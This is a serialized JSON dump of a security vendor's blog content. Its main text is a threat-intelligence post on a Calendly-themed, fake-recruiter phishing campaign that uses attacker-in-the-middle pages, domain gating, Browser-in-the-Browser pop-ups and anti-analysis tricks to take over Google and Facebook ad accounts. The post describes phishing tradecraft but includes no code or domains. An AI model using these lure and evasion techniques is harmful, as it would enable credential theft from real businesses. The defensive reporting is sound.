real-time.",{"data":28740,"content":28741,"nodeType":860},{},[28742],{"data":28743,"marks":28744,"value":21039,"nodeType":864},{},[],{"data":28746,"content":28747,"nodeType":860},{},[28748,28751,28758,28761,28768],{"data":28749,"marks":28750,"value":16314,"nodeType":864},{},[],{"data":28752,"content":28753,"nodeType":883},{"uri":10269},[28754],{"data":28755,"marks":28756,"value":10275,"nodeType":864},{},[28757],{"type":1455},{"data":28759,"marks":28760,"value":19754,"nodeType":864},{},[],{"data":28762,"content":28763,"nodeType":883},{"uri":1700},[28764],{"data":28765,"marks":28766,"value":10299,"nodeType":864},{},[28767],{"type":1455},{"data":28769,"marks":28770,"value":2924,"nodeType":864},{},[],{"data":28772,"content":28775,"nodeType":996},{"target":28773},{"sys":28774},{"id":27224,"type":1001,"linkType":1002},[],{"data":28777,"content":28778,"nodeType":860},{},[28779],{"data":28780,"marks":28781,"value":21,"nodeType":864},{},[],"Analysing a malvertising attack targeting business Google accounts intercepted by Push","Analysing a malvertising attack targeting Google business accounts that was intercepted by Push. ","2025-12-02T00:00:00.000Z","analysing-a-malvertising-attack-targeting-business-google-accounts",{"items":28787},[28788,28790],{"sys":28789,"name":342},{"id":6596},{"sys":28791,"name":6593},{"id":6592},{"items":28793},[28794],{"fullName":2736,"firstName":2737,"jobTitle":2738,"profilePicture":28795},{"url":2740},{"__typename":2059,"sys":28797,"content":28799,"title":29375,"synopsis":29376,"hashTags":59,"publishedDate":28784,"slug":29377,"tagsCollection":29378,"authorsCollection":29384},{"id":28798},"6Zosy4SU0LpjlaSWX75peb",{"json":28800},{"data":28801,"content":28802,"nodeType":856},{},[28803,28810,28817,28824,28830,28837,28840,28848,28855,28862,28869,28875,28882,28888,28895,28901,28908,28914,28944,28951,28957,28964,28970,28977,28983,28990,29033,29036,29044,29051,29058,29065,29071,29074,29082,29089,29109,29115,29121,29127,29134,29140,29146,29166,29169,29177,29196,29202,29209,29225,29233,29240,29247,29253,29271,29279,29286,29292,29295,29302,29309,29315,29318,29325,29332,29338,29364,29369],{"data":28804,"content":28805,"nodeType":860},{},[28806],{"data":28807,"marks":28808,"value":28809,"nodeType":864},{},[],"We recently investigated a sophisticated phishing campaign targeting Google Workspace and Facebook Business accounts with Calendly-themed phishing lures, based around a fake job opportunity. ",{"data":28811,"content":28812,"nodeType":860},{},[28813],{"data":28814,"marks":28815,"value":28816,"nodeType":864},{},[],"We were first alerted to the campaign when a Push customer was hit with a highly targeted email-based attack, where the attacker used an Attacker-in-the-Middle (AiTM) phishing toolkit to target the customer’s Google Workspace account. ",{"data":28818,"content":28819,"nodeType":860},{},[28820],{"data":28821,"marks":28822,"value":28823,"nodeType":864},{},[],"In this case, Google was the customer’s primary enterprise IdP account, used to access native Google suite apps as well as SSO to downstream apps — effectively, the front door to their business IT stack. Despite this, the attacker’s MO was specifically the takeover of accounts used for the management of digital ads. ",{"data":28825,"content":28829,"nodeType":996},{"target":28826},{"sys":28827},{"id":28828,"type":1001,"linkType":1002},"5oivBCf1Fqvnq0GNCSko8f",[],{"data":28831,"content":28832,"nodeType":860},{},[28833],{"data":28834,"marks":28835,"value":28836,"nodeType":864},{},[],"In this blog post, we break down the various TTPs used by the attacker across the campaign, and consider why ad management platforms are being specifically targeted.  ",{"data":28838,"content":28839,"nodeType":1005},{},[],{"data":28841,"content":28842,"nodeType":1009},{},[28843],{"data":28844,"marks":28845,"value":28847,"nodeType":864},{},[28846],{"type":899},"Variant 1: Targeting Google Workspace with a sophisticated email phish ",{"data":28849,"content":28850,"nodeType":860},{},[28851],{"data":28852,"marks":28853,"value":28854,"nodeType":864},{},[],"The first phishing variant we analyzed began with a multi-stage phishing email lure, framed as a job opportunity for LVMH (Louis Vuitton Moët Hennessy), which oversees more than 75 brands across sectors like fashion, cosmetics, watches, and spirits. The specific delivery address is impersonating “Inside LVMH”, the talent acquisition and training arm of LVMH.  ",{"data":28856,"content":28857,"nodeType":860},{},[28858],{"data":28859,"marks":28860,"value":28861,"nodeType":864},{},[],"This lure is notable for multiple reasons. It is highly targeted, well-written, populated with information from the victim, and coming from what appears to be a legitimate employee of LVMH. Even if the victim was initially suspicious, searching for the recruiter’s name would appear to confirm their identity.  ",{"data":28863,"content":28864,"nodeType":860},{},[28865],{"data":28866,"marks":28867,"value":28868,"nodeType":864},{},[],"It is possible, even likely, that this interaction was operated using AI, using information scraped from the internet — but in any case, the outcome achieved is highly convincing. ",{"data":28870,"content":28874,"nodeType":996},{"target":28871},{"sys":28872},{"id":28873,"type":1001,"linkType":1002},"46BYpquURERbkhWc6C2Lpc",[],{"data":28876,"content":28877,"nodeType":860},{},[28878],{"data":28879,"marks":28880,"value":28881,"nodeType":864},{},[],"Only after the victim has responded to an initial email was the phishing link delivered under the guise of a Calendly link to book time for a call. ",{"data":28883,"content":28887,"nodeType":996},{"target":28884},{"sys":28885},{"id":28886,"type":1001,"linkType":1002},"37GBkfXGEdWvdQbMq65sad",[],{"data":28889,"content":28890,"nodeType":860},{},[28891],{"data":28892,"marks":28893,"value":28894,"nodeType":864},{},[],"Clicking the link takes the victim to an authentic-looking page impersonating a Calendly landing page.",{"data":28896,"content":28900,"nodeType":996},{"target":28897},{"sys":28898},{"id":28899,"type":1001,"linkType":1002},"1DwOPzK7mxsoJlEBp8cMpr",[],{"data":28902,"content":28903,"nodeType":860},{},[28904],{"data":28905,"marks":28906,"value":28907,"nodeType":864},{},[],"After completing the CAPTCHA check and selecting \"Continue with Google” the victim is redirected to an AiTM phishing page designed to capture Google Workspace credentials, with specific branding impersonating Calendly — making this visually distinct from most common Google-themed phishing pages. ",{"data":28909,"content":28913,"nodeType":996},{"target":28910},{"sys":28911},{"id":28912,"type":1001,"linkType":1002},"u1SY1uUX23sxfBYLpyaKb",[],{"data":28915,"content":28916,"nodeType":860},{},[28917,28921,28929,28933,28940],{"data":28918,"marks":28919,"value":28920,"nodeType":864},{},[],"This page uses ",{"data":28922,"content":28923,"nodeType":883},{"uri":26883},[28924],{"data":28925,"marks":28926,"value":28928,"nodeType":864},{},[28927],{"type":1455},"specific targeting parameters",{"data":28930,"marks":28931,"value":28932,"nodeType":864},{},[]," to ensure that only the intended recipient is able to access the page’s malicious functionality — a well-known ",{"data":28934,"content":28935,"nodeType":883},{"uri":7124},[28936],{"data":28937,"marks":28938,"value":7129,"nodeType":864},{},[28939],{"type":1455},{"data":28941,"marks":28942,"value":28943,"nodeType":864},{},[]," to prevent security analysts from being able to fully analyse the page (as malicious elements are not rendered until this check is completed). ",{"data":28945,"content":28946,"nodeType":860},{},[28947],{"data":28948,"marks":28949,"value":28950,"nodeType":864},{},[],"As you can see in the example below, attempts to use any email other than the intended victim’s email domain are blocked.   ",{"data":28952,"content":28956,"nodeType":996},{"target":28953},{"sys":28954},{"id":28955,"type":1001,"linkType":1002},"5m8LvVYjXz0zrITgTWqxio",[],{"data":28958,"content":28959,"nodeType":860},{},[28960],{"data":28961,"marks":28962,"value":28963,"nodeType":864},{},[],"Only entering an allowed email domain loads the password entry field. ",{"data":28965,"content":28969,"nodeType":996},{"target":28966},{"sys":28967},{"id":28968,"type":1001,"linkType":1002},"6KFRJSsgk2pB6x67kWdpws",[],{"data":28971,"content":28972,"nodeType":860},{},[28973],{"data":28974,"marks":28975,"value":28976,"nodeType":864},{},[],"We identified a number of pages that appear to be part of the same campaign. All these pages have the same visual style, Calendly-themed lure targeting Google Workspace accounts, and appear to match real employees of the respective companies being impersonated. ",{"data":28978,"content":28982,"nodeType":996},{"target":28979},{"sys":28980},{"id":28981,"type":1001,"linkType":1002},"zMkN1U5QlvIEcfOGmhBBf",[],{"data":28984,"content":28985,"nodeType":860},{},[28986],{"data":28987,"marks":28988,"value":28989,"nodeType":864},{},[],"The different pages include:",{"data":28991,"content":28992,"nodeType":941},{},[28993,29003,29013,29023],{"data":28994,"content":28995,"nodeType":945},{},[28996],{"data":28997,"content":28998,"nodeType":860},{},[28999],{"data":29000,"marks":29001,"value":29002,"nodeType":864},{},[],"A different visual match for the LVMH page.",{"data":29004,"content":29005,"nodeType":945},{},[29006],{"data":29007,"content":29008,"nodeType":860},{},[29009],{"data":29010,"marks":29011,"value":29012,"nodeType":864},{},[],"A Lego recruitment themed page.",{"data":29014,"content":29015,"nodeType":945},{},[29016],{"data":29017,"content":29018,"nodeType":860},{},[29019],{"data":29020,"marks":29021,"value":29022,"nodeType":864},{},[],"A Mastercard HR themed page.",{"data":29024,"content":29025,"nodeType":945},{},[29026],{"data":29027,"content":29028,"nodeType":860},{},[29029],{"data":29030,"marks":29031,"value":29032,"nodeType":864},{},[],"An Uber recruitment themed page.",{"data":29034,"content":29035,"nodeType":1005},{},[],{"data":29037,"content":29038,"nodeType":1009},{},[29039],{"data":29040,"marks":29041,"value":29043,"nodeType":864},{},[29042],{"type":899},"Variant 2: Targeting Facebook Business accounts",{"data":29045,"content":29046,"nodeType":860},{},[29047],{"data":29048,"marks":29049,"value":29050,"nodeType":864},{},[],"Upon further investigation, we found links to a second phishing page style that appears to be part of a longer campaign targeting Facebook accounts, dating back more than two years. ",{"data":29052,"content":29053,"nodeType":860},{},[29054],{"data":29055,"marks":29056,"value":29057,"nodeType":864},{},[],"In total, we identified 31 unique URLs associated with the same campaign, many of which were recycled over time to impersonate different brands. ",{"data":29059,"content":29060,"nodeType":860},{},[29061],{"data":29062,"marks":29063,"value":29064,"nodeType":864},{},[],"Since most of these pages appeared to be older (and no longer live) they could not be analysed further, beyond giving an indication of how the phishing campaign has evolved over time. ",{"data":29066,"content":29070,"nodeType":996},{"target":29067},{"sys":29068},{"id":29069,"type":1001,"linkType":1002},"5PFRI9XtNVdkpYiRoIYpF",[],{"data":29072,"content":29073,"nodeType":1005},{},[],{"data":29075,"content":29076,"nodeType":1009},{},[29077],{"data":29078,"marks":29079,"value":29081,"nodeType":864},{},[29080],{"type":899},"Variant 3: Targeting both Google and Facebook accounts",{"data":29083,"content":29084,"nodeType":860},{},[29085],{"data":29086,"marks":29087,"value":29088,"nodeType":864},{},[],"We also discovered a third, more recent variant targeting both Google and Facebook accounts with Calendly-styled pages.",{"data":29090,"content":29091,"nodeType":860},{},[29092,29096,29105],{"data":29093,"marks":29094,"value":29095,"nodeType":864},{},[],"This variant looks to leverage a Browser-in-the-Browser style pop-up window similar to the ",{"data":29097,"content":29099,"nodeType":883},{"uri":29098},"https://pushsecurity.com/blog/analyzing-the-latest-sneaky2fa-phishing-page/",[29100],{"data":29101,"marks":29102,"value":29104,"nodeType":864},{},[29103],{"type":1455},"Sneaky2FA attacks we reported on recently",{"data":29106,"marks":29107,"value":29108,"nodeType":864},{},[],". BITB allows the attacker to mask the phishing page URL by presenting a fake URL set by the attacker, inside a pop-up login window. ",{"data":29110,"content":29114,"nodeType":996},{"target":29111},{"sys":29112},{"id":29113,"type":1001,"linkType":1002},"7w4cmyqPvhxAFrokaK9CE1",[],{"data":29116,"content":29120,"nodeType":996},{"target":29117},{"sys":29118},{"id":29119,"type":1001,"linkType":1002},"6FUSNecz0BXLxJxoJTsALD",[],{"data":29122,"content":29126,"nodeType":996},{"target":29123},{"sys":29124},{"id":29125,"type":1001,"linkType":1002},"2zwFDrgsLuxi4Xv2q0nPFK",[],{"data":29128,"content":29129,"nodeType":860},{},[29130],{"data":29131,"marks":29132,"value":29133,"nodeType":864},{},[],"The attacker also implemented additional anti-analysis functionality, beyond the specific domain targeting we observed in the first page variant — the result of which meant the page IP blocked us from interacting with it further. ",{"data":29135,"content":29139,"nodeType":996},{"target":29136},{"sys":29137},{"id":29138,"type":1001,"linkType":1002},"3ZPdxi5cGZcn5hF1ISIUa7",[],{"data":29141,"content":29145,"nodeType":996},{"target":29142},{"sys":29143},{"id":29144,"type":1001,"linkType":1002},"3J5pmgNL9LevE1FdX4oksf",[],{"data":29147,"content":29148,"nodeType":860},{},[29149,29153,29162],{"data":29150,"marks":29151,"value":29152,"nodeType":864},{},[],"Often ",{"data":29154,"content":29156,"nodeType":883},{"uri":29155},"https://phishing-techniques.pushsecurity.com/techniques/anti-sandbox/",[29157],{"data":29158,"marks":29159,"value":29161,"nodeType":864},{},[29160],{"type":1455},"accessing dev tools",{"data":29163,"marks":29164,"value":29165,"nodeType":864},{},[]," on a page is enough to trigger this, specifically targeting security analysts and web-crawling security bots/tools. ",{"data":29167,"content":29168,"nodeType":1005},{},[],{"data":29170,"content":29171,"nodeType":1009},{},[29172],{"data":29173,"marks":29174,"value":29176,"nodeType":864},{},[29175],{"type":899},"Why are attackers targeting business ad management accounts?",{"data":29178,"content":29179,"nodeType":860},{},[29180,29184,29192],{"data":29181,"marks":29182,"value":29183,"nodeType":864},{},[],"The campaign shows signs of being a long-running, targeted initiative focused on compromising accounts responsible for managing digital ads on behalf of businesses. The attackers have demonstrated that they are continuing to iterate on their TTPs, introducing new page styles with increased sophistication, and new ",{"data":29185,"content":29187,"nodeType":883},{"uri":29186},"https://phishing-techniques.pushsecurity.com/#techniques-table",[29188],{"data":29189,"marks":29190,"value":13810,"nodeType":864},{},[29191],{"type":1455},{"data":29193,"marks":29194,"value":29195,"nodeType":864},{},[]," to defeat security analysis tools.  ",{"data":29197,"content":29201,"nodeType":996},{"target":29198},{"sys":29199},{"id":29200,"type":1001,"linkType":1002},"m5GsTsDb55T70MU2m72B1",[],{"data":29203,"content":29204,"nodeType":860},{},[29205],{"data":29206,"marks":29207,"value":29208,"nodeType":864},{},[],"We also discovered that Google recently issued a security warning specifically for agency organizations managing ads for a number of businesses, urging them to create security alerts whenever a new account is added to a Manager Account (MCC) used to view and manage multiple Google Ads accounts from a single view. ",{"data":29210,"content":29211,"nodeType":860},{},[29212,29215,29222],{"data":29213,"marks":29214,"value":28577,"nodeType":864},{},[],{"data":29216,"content":29217,"nodeType":883},{"uri":13019},[29218],{"data":29219,"marks":29220,"value":315,"nodeType":864},{},[29221],{"type":1455},{"data":29223,"marks":29224,"value":28588,"nodeType":864},{},[],{"data":29226,"content":29227,"nodeType":1312},{},[29228],{"data":29229,"marks":29230,"value":29232,"nodeType":864},{},[29231],{"type":899},"Why are attackers turning to malvertising?",{"data":29234,"content":29235,"nodeType":860},{},[29236],{"data":29237,"marks":29238,"value":29239,"nodeType":864},{},[],"Malvertising attacks delivered over search engines (e.g. Google Search) and social media apps (Facebook, LinkedIn, etc.) are a great way to catch victims unawares while also evading typically email-based anti-phishing controls. ",{"data":29241,"content":29242,"nodeType":860},{},[29243],{"data":29244,"marks":29245,"value":29246,"nodeType":864},{},[],"The flipside of this is that malvertising attacks are less likely to be targeted than phishing delivered directly to the victim via a direct message (i.e. email, social media DM, instant messenger app, SMS, etc.). ",{"data":29248,"content":29249,"nodeType":860},{},[29250],{"data":29251,"marks":29252,"value":28556,"nodeType":864},{},[],{"data":29254,"content":29255,"nodeType":860},{},[29256,29260,29267],{"data":29257,"marks":29258,"value":29259,"nodeType":864},{},[],"Malvertising is an effective way to launch “watering hole” style attacks, casting a wide net to harvest credentials and account access that can be re-sold to other criminals for a fee, or leveraged by partners in the cybercriminal ecosystem as part of major cyber breaches (such as the recent attacks by the “",{"data":29261,"content":29262,"nodeType":883},{"uri":6237},[29263],{"data":29264,"marks":29265,"value":6242,"nodeType":864},{},[29266],{"type":1455},{"data":29268,"marks":29269,"value":29270,"nodeType":864},{},[],"” criminal collective, all of which began with identity-based initial access). For this reason, credentials and access are an increasingly profitable commodity for cyber criminals. ",{"data":29272,"content":29273,"nodeType":1312},{},[29274],{"data":29275,"marks":29276,"value":29278,"nodeType":864},{},[29277],{"type":899},"Additional considerations",{"data":29280,"content":29281,"nodeType":860},{},[29282],{"data":29283,"marks":29284,"value":29285,"nodeType":864},{},[],"As previously mentioned, compromising a Google Workspace account (particularly where it is the primary enterprise cloud platform used by the organization) provides comprehensive access to business apps, data, and functionality that can be exploited by attackers — effectively, it’s the access point to modern business IT. There’s a good chance that attackers establishing a foothold in this way would look to leverage this access further, or at least sell on that access to a criminal group looking to take the attack further. ",{"data":29287,"content":29291,"nodeType":996},{"target":29288},{"sys":29289},{"id":29290,"type":1001,"linkType":1002},"7jnQqRk0JuqEtrQ3HXy3f8",[],{"data":29293,"content":29294,"nodeType":1005},{},[],{"data":29296,"content":29297,"nodeType":1009},{},[29298],{"data":29299,"marks":29300,"value":5571,"nodeType":864},{},[29301],{"type":899},{"data":29303,"content":29304,"nodeType":860},{},[29305],{"data":29306,"marks":29307,"value":29308,"nodeType":864},{},[],"We have opted not to provide the domains associated with that campaign to preserve the privacy of the individuals being impersonated by the attacker. In many cases, their full name was included in the URL for the phishing page, while their name and profile picture (most likely scraped from LinkedIn) are also visible on the landing page. ",{"data":29310,"content":29311,"nodeType":860},{},[29312],{"data":29313,"marks":29314,"value":28714,"nodeType":864},{},[],{"data":29316,"content":29317,"nodeType":1005},{},[],{"data":29319,"content":29320,"nodeType":1009},{},[29321],{"data":29322,"marks":29323,"value":3578,"nodeType":864},{},[29324],{"type":899},{"data":29326,"content":29327,"nodeType":860},{},[29328],{"data":29329,"marks":29330,"value":29331,"nodeType":864},{},[],"Push researchers are continuously analysing and developing new detections based on the latest phishing kits and TTPs which enables us to stay two steps ahead of attackers.",{"data":29333,"content":29334,"nodeType":860},{},[29335],{"data":29336,"marks":29337,"value":19737,"nodeType":864},{},[],{"data":29339,"content":29340,"nodeType":860},{},[29341,29344,29351,29354,29361],{"data":29342,"marks":29343,"value":16314,"nodeType":864},{},[],{"data":29345,"content":29346,"nodeType":883},{"uri":10269},[29347],{"data":29348,"marks":29349,"value":10275,"nodeType":864},{},[29350],{"type":1455},{"data":29352,"marks":29353,"value":19754,"nodeType":864},{},[],{"data":29355,"content":29356,"nodeType":883},{"uri":1700},[29357],{"data":29358,"marks":29359,"value":10299,"nodeType":864},{},[29360],{"type":1455},{"data":29362,"marks":29363,"value":2924,"nodeType":864},{},[],{"data":29365,"content":29368,"nodeType":996},{"target":29366},{"sys":29367},{"id":27224,"type":1001,"linkType":1002},[],{"data":29370,"content":29371,"nodeType":860},{},[29372],{"data":29373,"marks":29374,"value":21,"nodeType":864},{},[],"Uncovering a Calendly-themed phishing campaign targeting business ad manager accounts","Investigating a phishing campaign targeting Google Ads Manager MCC accounts to propagate malvertising lures. ","uncovering-a-calendly-themed-phishing-campaign",{"items":29379},[29380,29382],{"sys":29381,"name":6593},{"id":6592},{"sys":29383,"name":342},{"id":6596},{"items":29385},[29386],{"fullName":4949,"firstName":4950,"jobTitle":4951,"profilePicture":29387},{"url":4955},"blog/google-search-malvertising-campaign-continues-now-impersonating-ahrefs",{"json":29390},{"data":29391,"content":29392,"nodeType":856},{},[29393],{"data":29394,"content":29395,"nodeType":860},{},[29396],{"data":29397,"marks":29398,"value":29399,"nodeType":864},{},[],"In December, we reported on malvertising attacks delivered via Google Search specifically targeting Google Ad Manager accounts. Now, we’ve intercepted more attacks targeting Push customers, this time impersonating Ahrefs. Here’s what you need to know. ",{"id":20680,"publishedAt":29401},"2026-08-12T11:53:21.526Z",{"items":29403},[29404,29406],{"sys":29405,"name":342},{"id":6596},{"sys":29407,"name":6593},{"id":6592},{"items":29409},[29410,29412,29414,29416,29418,29420,29422,29424,29426],{"sys":29411,"name":279,"slug":280,"tier":31},{"id":276},{"sys":29413,"name":519,"slug":520,"tier":31},{"id":516},{"sys":29415,"name":342,"slug":343,"tier":31},{"id":339},{"sys":29417,"name":440,"slug":441,"tier":45},{"id":437},{"sys":29419,"name":261,"slug":262,"tier":45},{"id":258},{"sys":29421,"name":571,"slug":572,"tier":45},{"id":568},{"sys":29423,"name":324,"slug":325,"tier":45},{"id":321},{"sys":29425,"name":475,"slug":476,"tier":45},{"id":472},{"sys":29427,"name":431,"slug":432,"tier":45},{"id":428},"KnvzO0A4xbnGOCUl5iUeBFfmPD0Jf_MV-PD_yGFadcc",{"id":29430,"title":27232,"authorsCollection":29431,"content":29436,"extension":228,"faqItemsCollection":30104,"faqTitle":59,"featured":6,"hashTags":59,"meta":30106,"metaTitle":30107,"ogImage":59,"postType":13349,"publishedDate":27234,"relatedBlogPostsCollection":30108,"slug":27235,"stem":32303,"subtitle":59,"summary":32304,"synopsis":27233,"sys":32315,"tagsCollection":32317,"topicsCollection":32323,"__hash__":32369},"blog/blog/2025-top-phishing-trends.json",{"items":29432},[29433],{"fullName":2736,"firstName":2737,"jobTitle":2738,"socialLinks":29434,"profilePicture":29435},[18135],{"url":2740},{"json":29437,"links":30017},{"data":29438,"content":29439,"nodeType":856},{},[29440,29445,29451,29457,29460,29467,29473,29479,29485,29565,29570,29575,29580,29586,29592,29608,29611,29618,29624,29630,29636,29672,29678,29718,29723,29729,29735,29738,29745,29751,29757,29763,29827,29832,29837,29863,29868,29884,29889,29895,29901,29906,29909,29916,29922,29952,29958,29961,29968,29974,29980,30006,30011],{"data":29441,"content":29444,"nodeType":996},{"target":29442},{"sys":29443},{"id":26573,"type":1001,"linkType":1002},[],{"data":29446,"content":29447,"nodeType":860},{},[29448],{"data":29449,"marks":29450,"value":26581,"nodeType":864},{},[],{"data":29452,"content":29453,"nodeType":860},{},[29454],{"data":29455,"marks":29456,"value":26588,"nodeType":864},{},[],{"data":29458,"content":29459,"nodeType":1005},{},[],{"data":29461,"content":29462,"nodeType":1009},{},[29463],{"data":29464,"marks":29465,"value":26599,"nodeType":864},{},[29466],{"type":899},{"data":29468,"content":29469,"nodeType":860},{},[29470],{"data":29471,"marks":29472,"value":26606,"nodeType":864},{},[],{"data":29474,"content":29475,"nodeType":860},{},[29476],{"data":29477,"marks":29478,"value":26613,"nodeType":864},{},[],{"data":29480,"content":29481,"nodeType":860},{},[29482],{"data":29483,"marks":29484,"value":26620,"nodeType":864},{},[],{"data":29486,"content":29487,"nodeType":941},{},[29488,29507,29526],{"data":29489,"content":29490,"nodeType":945},{},[29491],{"data":29492,"content":29493,"nodeType":860},{},[29494,29497,29504],{"data":29495,"marks":29496,"value":21,"nodeType":864},{},[],{"data":29498,"content":29499,"nodeType":883},{"uri":26635},[29500],{"data":29501,"marks":29502,"value":26641,"nodeType":864},{},[29503],{"type":1455},{"data":29505,"marks":29506,"value":26645,"nodeType":864},{},[],{"data":29508,"content":29509,"nodeType":945},{},[29510],{"data":29511,"content":29512,"nodeType":860},{},[29513,29516,29523],{"data":29514,"marks":29515,"value":21,"nodeType":864},{},[],{"data":29517,"content":29518,"nodeType":883},{"uri":26657},[29519],{"data":29520,"marks":29521,"value":26663,"nodeType":864},{},[29522],{"type":1455},{"data":29524,"marks":29525,"value":26667,"nodeType":864},{},[],{"data":29527,"content":29528,"nodeType":945},{},[29529],{"data":29530,"content":29531,"nodeType":860},{},[29532,29535,29542,29545,29552,29555,29562],{"data":29533,"marks":29534,"value":26677,"nodeType":864},{},[],{"data":29536,"content":29537,"nodeType":883},{"uri":26680},[29538],{"data":29539,"marks":29540,"value":26686,"nodeType":864},{},[29541],{"type":1455},{"data":29543,"marks":29544,"value":26690,"nodeType":864},{},[],{"data":29546,"content":29547,"nodeType":883},{"uri":26693},[29548],{"data":29549,"marks":29550,"value":20965,"nodeType":864},{},[29551],{"type":1455},{"data":29553,"marks":29554,"value":26702,"nodeType":864},{},[],{"data":29556,"content":29557,"nodeType":883},{"uri":26705},[29558],{"data":29559,"marks":29560,"value":20989,"nodeType":864},{},[29561],{"type":1455},{"data":29563,"marks":29564,"value":26714,"nodeType":864},{},[],{"data":29566,"content":29569,"nodeType":996},{"target":29567},{"sys":29568},{"id":26719,"type":1001,"linkType":1002},[],{"data":29571,"content":29574,"nodeType":996},{"target":29572},{"sys":29573},{"id":26725,"type":1001,"linkType":1002},[],{"data":29576,"content":29579,"nodeType":996},{"target":29577},{"sys":29578},{"id":26731,"type":1001,"linkType":1002},[],{"data":29581,"content":29582,"nodeType":860},{},[29583],{"data":29584,"marks":29585,"value":26739,"nodeType":864},{},[],{"data":29587,"content":29588,"nodeType":860},{},[29589],{"data":29590,"marks":29591,"value":26746,"nodeType":864},{},[],{"data":29593,"content":29594,"nodeType":860},{},[29595,29598,29605],{"data":29596,"marks":29597,"value":26753,"nodeType":864},{},[],{"data":29599,"content":29600,"nodeType":883},{"uri":26756},[29601],{"data":29602,"marks":29603,"value":6242,"nodeType":864},{},[29604],{"type":1455},{"data":29606,"marks":29607,"value":26765,"nodeType":864},{},[],{"data":29609,"content":29610,"nodeType":1005},{},[],{"data":29612,"content":29613,"nodeType":1009},{},[29614],{"data":29615,"marks":29616,"value":26776,"nodeType":864},{},[29617],{"type":899},{"data":29619,"content":29620,"nodeType":860},{},[29621],{"data":29622,"marks":29623,"value":26783,"nodeType":864},{},[],{"data":29625,"content":29626,"nodeType":860},{},[29627],{"data":29628,"marks":29629,"value":26790,"nodeType":864},{},[],{"data":29631,"content":29632,"nodeType":860},{},[29633],{"data":29634,"marks":29635,"value":26797,"nodeType":864},{},[],{"data":29637,"content":29638,"nodeType":860},{},[29639,29642,29649,29652,29659,29662,29669],{"data":29640,"marks":29641,"value":26804,"nodeType":864},{},[],{"data":29643,"content":29644,"nodeType":883},{"uri":26807},[29645],{"data":29646,"marks":29647,"value":26813,"nodeType":864},{},[29648],{"type":1455},{"data":29650,"marks":29651,"value":2232,"nodeType":864},{},[],{"data":29653,"content":29654,"nodeType":883},{"uri":7124},[29655],{"data":29656,"marks":29657,"value":13810,"nodeType":864},{},[29658],{"type":1455},{"data":29660,"marks":29661,"value":26827,"nodeType":864},{},[],{"data":29663,"content":29664,"nodeType":883},{"uri":26830},[29665],{"data":29666,"marks":29667,"value":26836,"nodeType":864},{},[29668],{"type":1455},{"data":29670,"marks":29671,"value":26840,"nodeType":864},{},[],{"data":29673,"content":29674,"nodeType":860},{},[29675],{"data":29676,"marks":29677,"value":26847,"nodeType":864},{},[],{"data":29679,"content":29680,"nodeType":941},{},[29681,29690,29699],{"data":29682,"content":29683,"nodeType":945},{},[29684],{"data":29685,"content":29686,"nodeType":860},{},[29687],{"data":29688,"marks":29689,"value":26860,"nodeType":864},{},[],{"data":29691,"content":29692,"nodeType":945},{},[29693],{"data":29694,"content":29695,"nodeType":860},{},[29696],{"data":29697,"marks":29698,"value":26870,"nodeType":864},{},[],{"data":29700,"content":29701,"nodeType":945},{},[29702],{"data":29703,"content":29704,"nodeType":860},{},[29705,29708,29715],{"data":29706,"marks":29707,"value":26880,"nodeType":864},{},[],{"data":29709,"content":29710,"nodeType":883},{"uri":26883},[29711],{"data":29712,"marks":29713,"value":26889,"nodeType":864},{},[29714],{"type":1455},{"data":29716,"marks":29717,"value":26893,"nodeType":864},{},[],{"data":29719,"content":29722,"nodeType":996},{"target":29720},{"sys":29721},{"id":26898,"type":1001,"linkType":1002},[],{"data":29724,"content":29725,"nodeType":860},{},[29726],{"data":29727,"marks":29728,"value":26906,"nodeType":864},{},[],{"data":29730,"content":29731,"nodeType":860},{},[29732],{"data":29733,"marks":29734,"value":26913,"nodeType":864},{},[],{"data":29736,"content":29737,"nodeType":1005},{},[],{"data":29739,"content":29740,"nodeType":1009},{},[29741],{"data":29742,"marks":29743,"value":26924,"nodeType":864},{},[29744],{"type":899},{"data":29746,"content":29747,"nodeType":860},{},[29748],{"data":29749,"marks":29750,"value":26931,"nodeType":864},{},[],{"data":29752,"content":29753,"nodeType":860},{},[29754],{"data":29755,"marks":29756,"value":26938,"nodeType":864},{},[],{"data":29758,"content":29759,"nodeType":860},{},[29760],{"data":29761,"marks":29762,"value":26945,"nodeType":864},{},[],{"data":29764,"content":29765,"nodeType":941},{},[29766,29790,29814],{"data":29767,"content":29768,"nodeType":945},{},[29769],{"data":29770,"content":29771,"nodeType":860},{},[29772,29775,29783,29787],{"data":29773,"marks":29774,"value":21,"nodeType":864},{},[],{"data":29776,"content":29777,"nodeType":883},{"uri":22596},[29778],{"data":29779,"marks":29780,"value":26966,"nodeType":864},{},[29781,29782],{"type":1455},{"type":899},{"data":29784,"marks":29785,"value":26971,"nodeType":864},{},[29786],{"type":899},{"data":29788,"marks":29789,"value":26975,"nodeType":864},{},[],{"data":29791,"content":29792,"nodeType":945},{},[29793],{"data":29794,"content":29795,"nodeType":860},{},[29796,29799,29807,29811],{"data":29797,"marks":29798,"value":21,"nodeType":864},{},[],{"data":29800,"content":29801,"nodeType":883},{"uri":13394},[29802],{"data":29803,"marks":29804,"value":360,"nodeType":864},{},[29805,29806],{"type":1455},{"type":899},{"data":29808,"marks":29809,"value":7961,"nodeType":864},{},[29810],{"type":899},{"data":29812,"marks":29813,"value":27000,"nodeType":864},{},[],{"data":29815,"content":29816,"nodeType":945},{},[29817],{"data":29818,"content":29819,"nodeType":860},{},[29820,29824],{"data":29821,"marks":29822,"value":27011,"nodeType":864},{},[29823],{"type":899},{"data":29825,"marks":29826,"value":27015,"nodeType":864},{},[],{"data":29828,"content":29831,"nodeType":996},{"target":29829},{"sys":29830},{"id":27020,"type":1001,"linkType":1002},[],{"data":29833,"content":29836,"nodeType":996},{"target":29834},{"sys":29835},{"id":27026,"type":1001,"linkType":1002},[],{"data":29838,"content":29839,"nodeType":860},{},[29840,29843,29850,29853,29860],{"data":29841,"marks":29842,"value":27034,"nodeType":864},{},[],{"data":29844,"content":29845,"nodeType":883},{"uri":27037},[29846],{"data":29847,"marks":29848,"value":315,"nodeType":864},{},[29849],{"type":1455},{"data":29851,"marks":29852,"value":27046,"nodeType":864},{},[],{"data":29854,"content":29855,"nodeType":883},{"uri":27049},[29856],{"data":29857,"marks":29858,"value":27055,"nodeType":864},{},[29859],{"type":1455},{"data":29861,"marks":29862,"value":27059,"nodeType":864},{},[],{"data":29864,"content":29867,"nodeType":996},{"target":29865},{"sys":29866},{"id":27064,"type":1001,"linkType":1002},[],{"data":29869,"content":29870,"nodeType":860},{},[29871,29874,29881],{"data":29872,"marks":29873,"value":27072,"nodeType":864},{},[],{"data":29875,"content":29876,"nodeType":883},{"uri":